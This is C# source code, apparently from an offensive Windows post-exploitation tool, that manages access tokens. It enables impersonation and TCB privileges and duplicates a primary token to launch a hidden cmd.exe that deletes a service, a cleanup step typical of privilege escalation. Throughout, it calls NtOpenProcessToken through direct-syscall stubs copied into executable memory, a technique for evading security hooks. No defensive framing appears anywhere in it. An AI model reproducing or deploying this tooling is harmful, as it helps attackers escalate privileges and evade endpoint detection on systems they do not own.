// Code from https://www.pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html public static bool IsHighIntegrity(SyscallManager syscall) { IntPtr pId = (Process.GetCurrentProcess().Handle); IntPtr hToken = IntPtr.Zero; IntPtr baseAddr = IntPtr.Zero; byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken"); var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite); Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length); var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken)); IntPtr token = IntPtr.Zero; var arguments = new object[] { pId, TokenAccessFlags.TOKEN_QUERY, token }; var returnValue = syscallDelegate.DynamicInvoke(arguments); if ((int)returnValue == 0) { try { hToken = (IntPtr)arguments[2]; IntPtr pb = Marshal.AllocCoTaskMem(1000); try { uint cb = 1000; if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb)) { IntPtr pSid = Marshal.ReadIntPtr(pb); int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U))); return(dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID ? true : false); } } finally { Marshal.FreeCoTaskMem(pb); } } finally { CloseHandle(hToken); } } return(false); }
public TokenManager(SyscallManager syscall) { Token = IntPtr.Zero; Method = 0; this.syscall = syscall; }
public void Start() { SyscallManager syscall = new SyscallManager(); try { IntPtr token = WindowsIdentity.GetCurrent().Token; List <string> aPrivs = new List <string>(); aPrivs.Add("SeImpersonatePrivilege"); aPrivs.Add("SeTcbPrivilege"); aPrivs.Add("SeAssignPrimaryTokenPrivilege"); aPrivs.Add("SeIncreaseQuotaPrivilege"); IntPtr currentToken; IntPtr baseAddr = IntPtr.Zero; byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken"); var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite); Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length); var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken)); IntPtr t = IntPtr.Zero; var arguments = new object[] { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, t }; var returnValue = syscallDelegate.DynamicInvoke(arguments); currentToken = (IntPtr)arguments[2]; enablePrivileges(currentToken, aPrivs); CloseHandle(currentToken); TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY | TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT | TokenAccessFlags.TOKEN_ADJUST_SESSIONID; IntPtr newToken = IntPtr.Zero; if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken)) { return; } STARTUPINFO startupInfo = new STARTUPINFO(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = ""; startupInfo.wShowWindow = 0; startupInfo.dwFlags |= 0x00000001; PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION(); LogonFlags l = new LogonFlags(); if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo)) { TokenManager.Token = newToken; TokenManager.Method = 1; } else { if (CreateProcessWithTokenW(newToken, l, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, 0, IntPtr.Zero, null, ref startupInfo, out processInfo)) { TokenManager.Token = newToken; TokenManager.Method = 2; } } } catch { } }
public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SyscallManager syscall) { IntPtr baseAddr = IntPtr.Zero; byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken"); var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite); Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length); var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken)); IntPtr token = IntPtr.Zero; var arguments = new object[] { handle, access, token }; var returnValue = syscallDelegate.DynamicInvoke(arguments); currentToken = (IntPtr)arguments[2]; }